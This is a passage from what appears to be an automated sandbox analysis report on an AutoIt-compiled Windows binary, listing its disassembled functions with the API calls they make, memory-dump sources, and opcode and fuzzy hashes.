                                                                                                                                                                                        • Part of subcall function 0091F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0094AEA5,?,?,00000000,00000008), ref: 0091F282
                                                                                                                                                                                        • Part of subcall function 0091F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0094AEA5,?,?,00000000,00000008), ref: 0091F2A6
                                                                                                                                                                                      • gethostbyname.WS2_32(?,?,?), ref: 009592F0
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 009592FB
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00959328
                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00959333
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1504782959-0
                                                                                                                                                                                      • Opcode ID: ec36b65b8d0669a5c1a4e5199d7d2e33c80600b99a56fb6ebf7a5c4e2ea544bc
                                                                                                                                                                                      • Instruction ID: 2c65ff8c698f8d9a9b3a134b0a8916a50a1792c38a98775e85e1bc2670b8279e
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec36b65b8d0669a5c1a4e5199d7d2e33c80600b99a56fb6ebf7a5c4e2ea544bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9116076A00109EFCB04FBA4CD56EEE77B9EF84311B144015F506A72A1DB30EE04DB61
                                                                                                                                                                                      Function 00903BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00973CF1
                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?,?,00000001,009C22E8), ref: 00973D35
                                                                                                                                                                                        • Part of subcall function 009031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 009031DA
                                                                                                                                                                                        • Part of subcall function 00903A67: SHGetMalloc.SHELL32(00903C31), ref: 00903A7D
                                                                                                                                                                                        • Part of subcall function 00903A67: SHGetDesktopFolder.SHELL32(?), ref: 00903A8F
                                                                                                                                                                                        • Part of subcall function 00903A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00903AD2
                                                                                                                                                                                        • Part of subcall function 00903B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,009C22E8,?), ref: 00903B65
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                      • API String ID: 3714316930-3081909835
                                                                                                                                                                                      • Opcode ID: 470759798dbce2160e8b68cbeb20037100c4906dc9f6b3ad0378977d18d978db
                                                                                                                                                                                      • Instruction ID: bca25901897e01849ab5e67b89b8a5fd5217e222ae25972e12999af5906684b5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 470759798dbce2160e8b68cbeb20037100c4906dc9f6b3ad0378977d18d978db
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3811CAB1A10298AFCF05DF94D8056DE7BFDAF86704F00C00DE441BB281CBB456498BA1
                                                                                                                                                                                      Function 0095F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 266c73425e6e813545882af67d75db13da09eed871bb56921d6b1a30afafeea9
                                                                                                                                                                                      • Instruction ID: 9277316d2c135c3ddae8b2a3deac4bae7e3ea9f97b727026139ca63fc9a61294
                                                                                                                                                                                      • Opcode Fuzzy Hash: 266c73425e6e813545882af67d75db13da09eed871bb56921d6b1a30afafeea9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F17A716087019FC710DF29C894B5AB7E5FFC8324F10892EF9998B292D730E949CB82
                                                                                                                                                                                      Function 00978071 Relevance: 4.8, APIs: 3, Instructions: 266COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClearVariant_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 19560607-0
                                                                                                                                                                                      • Opcode ID: d598bcb6298497395624d004e60c6a1764a56d8f374c33426e07dbab1f7b8b55
                                                                                                                                                                                      • Instruction ID: ceeaea7d89d91753a825730901b471b7a57ee2104937dc0bbd7a1af6ab117806
                                                                                                                                                                                      • Opcode Fuzzy Hash: d598bcb6298497395624d004e60c6a1764a56d8f374c33426e07dbab1f7b8b55
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BA1BD75B0420A9FCB24DF58D881AA9F7B5FF44300F54C429E819AB355D735ED92CB80
                                                                                                                                                                                      Function 0090C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0090C00E,?,?,?,?,00000010), ref: 0090C627
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0090C65F
                                                                                                                                                                                      • _memmove.LIBCMT ref: 0090C697
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3033907384-0
                                                                                                                                                                                      • Opcode ID: 99caf362ec03735d52f3eb9ae1817443a0345344efdfa0ce2b32a2913038b07d
                                                                                                                                                                                      • Instruction ID: 9c8cd3e204a277bbaec2388347d6dd08909946df649b4607ae3f93e6c459917e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 99caf362ec03735d52f3eb9ae1817443a0345344efdfa0ce2b32a2913038b07d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9731E9B26052016FD7249B74D846B1BB7DAEFC4310F10463AF95ACB2E5EB32E9508751
                                                                                                                                                                                      Function 00903A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHGetMalloc.SHELL32(00903C31), ref: 00903A7D
                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00903AD2
                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00903A8F
                                                                                                                                                                                        • Part of subcall function 00903B1E: _wcsncpy.LIBCMT ref: 00903B32
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3981382179-0
                                                                                                                                                                                      • Opcode ID: e00c3da94d9b29aa504b17ee1bdce47322d94817cf53adad7143d82da0402e75
                                                                                                                                                                                      • Instruction ID: 897548f5021ef3d626055528cdf85e0ada413a92dc10a762e592690a652d377f
                                                                                                                                                                                      • Opcode Fuzzy Hash: e00c3da94d9b29aa504b17ee1bdce47322d94817cf53adad7143d82da0402e75
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F211D76B00114AFCB14DBA5D884EAEB7BDEF88754B108094F509D7291DB709E46DB90
                                                                                                                                                                                      Function 009245EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00924603
                                                                                                                                                                                        • Part of subcall function 00928E52: __NMSG_WRITE.LIBCMT ref: 00928E79
                                                                                                                                                                                        • Part of subcall function 00928E52: __NMSG_WRITE.LIBCMT ref: 00928E83
                                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0092460A
                                                                                                                                                                                        • Part of subcall function 00928EB2: GetModuleFileNameW.KERNEL32(00000000,009C0312,00000104,?,00000001,00920127), ref: 00928F44
                                                                                                                                                                                        • Part of subcall function 00928EB2: ___crtMessageBoxW.LIBCMT ref: 00928FF2
                                                                                                                                                                                        • Part of subcall function 00921D65: ___crtCorExitProcess.LIBCMT ref: 00921D6B
                                                                                                                                                                                        • Part of subcall function 00921D65: ExitProcess.KERNEL32 ref: 00921D74
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(01380000,00000000,00000001,?,?,?,?,00920127,?,0090125D,00000058,?,?), ref: 0092462F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1372826849-0
                                                                                                                                                                                      • Opcode ID: 152759fc6d97d0f87d50669701c6e1b19c969bb556d76a5b6a22030a0ab66fcc
                                                                                                                                                                                      • Instruction ID: 72c463f6850a26e14ad1433caefb255d18d967c2300854a5e33e8334a0a83b1a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 152759fc6d97d0f87d50669701c6e1b19c969bb556d76a5b6a22030a0ab66fcc
                                                                                                                                                                                      • Instruction Fuzzy Hash: D101B532646331AAE6217B34BC42B2B334CAFC2761F110525F6159B2DDDFB49C408664
                                                                                                                                                                                      Function 0090E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0090E646
                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0090E651
                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090E664
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4217535847-0
                                                                                                                                                                                      • Opcode ID: 0a1a4cde74110275d2ae5b61e4af60d9cd253cc30b6afc1ee1950d0dec43e1a6
                                                                                                                                                                                      • Instruction ID: 5c8a8da9a1bb9e325881e505d72677c7d7c6b66e7d3cce3e7774189d34e48a63
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a1a4cde74110275d2ae5b61e4af60d9cd253cc30b6afc1ee1950d0dec43e1a6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF01C726093499BDB24EBE49D49FABB3DDBB94740F180C3DB645C21C0EBB5D4449722
                                                                                                                                                                                      Function 0094C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0094C45E
                                                                                                                                                                                        • Part of subcall function 009228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00928715,00000000,009288A3,00924673,?), ref: 009228DE
                                                                                                                                                                                        • Part of subcall function 009228CA: GetLastError.KERNEL32(00000000,?,00928715,00000000,009288A3,00924673,?), ref: 009228F0
                                                                                                                                                                                      • _free.LIBCMT ref: 0094C46F
                                                                                                                                                                                      • _free.LIBCMT ref: 0094C481
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                                      • Instruction ID: e5aab04735638fdfe07b9f3f1049d46c4d34a453b79a88e332bb15b55cda8d0b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CE017E1602721AACA68AA79B954FB363CC6F44761B14482EF449E7186DF2CE8408138
                                                                                                                                                                                      Function 0091058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                                      • API String ID: 0-4196123274
                                                                                                                                                                                      • Opcode ID: 3db53fa49232835d2f80240b4e78ff54b3603b9dffdffc50207850b963a8692f
                                                                                                                                                                                      • Instruction ID: d933cd0a05c4b4975db3c075f70b620b71b228292e4b21ba3620280c2296ddcd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3db53fa49232835d2f80240b4e78ff54b3603b9dffdffc50207850b963a8692f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15225A70608345DFDB28DF14C490B6AB7E5BFC8304F14895DE99A8B2A2D776E885CF42
                                                                                                                                                                                      Function 0090131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009016F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009014EB), ref: 00901751
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0090159B
                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00901612
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 009758F7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3815369404-0
                                                                                                                                                                                      • Opcode ID: f7bcfb7c241a7412274f798fa014c9dff5906e8553f91b1085f23f3d0fa5059d
                                                                                                                                                                                      • Instruction ID: 6df7bc3d524fdd1c55997982557c04191351e7100b68d59567fff80d56f94c20
                                                                                                                                                                                      • Opcode Fuzzy Hash: f7bcfb7c241a7412274f798fa014c9dff5906e8553f91b1085f23f3d0fa5059d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86719DB4D293418FC718EF5AA994D54BBE5FB9B345394412EE00A872B3CB308454AF6D
                                                                                                                                                                                      Function 00904010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID: EA06
                                                                                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                                                                                      • Opcode ID: 4815abb824976ea2cfeca07ddd5c6631ca704422bbe480659879fd2c50a5ca6d
                                                                                                                                                                                      • Instruction ID: 6e27eb0322af800b3166e0f1f08e4dc2ba51e1c7df7ed3fe4ba4a74346bf2c7e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4815abb824976ea2cfeca07ddd5c6631ca704422bbe480659879fd2c50a5ca6d
                                                                                                                                                                                      • Instruction Fuzzy Hash: BD417DF1A0C1589FDB119B648C517BE7FB68FA5300F184865EB82FB1C3C6259DC087A1
                                                                                                                                                                                      Function 0095013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscmp
                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                      • API String ID: 856254489-3771769585
                                                                                                                                                                                      • Opcode ID: d2207e2472b70529e9bffca42080241b37685ddbe774e83be1c534dc95dd6961
                                                                                                                                                                                      • Instruction ID: b0ba3550b72b48dbe0c1938f5c8eb74bc39fea997c2d5a04e45051d44cc8dcca
                                                                                                                                                                                      • Opcode Fuzzy Hash: d2207e2472b70529e9bffca42080241b37685ddbe774e83be1c534dc95dd6961
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83113236704604EFCB14EF29CAC1E59B3A9AFC4710B048049F905AF391DA30EE85CBA1
                                                                                                                                                                                      Function 009034C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009734AA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
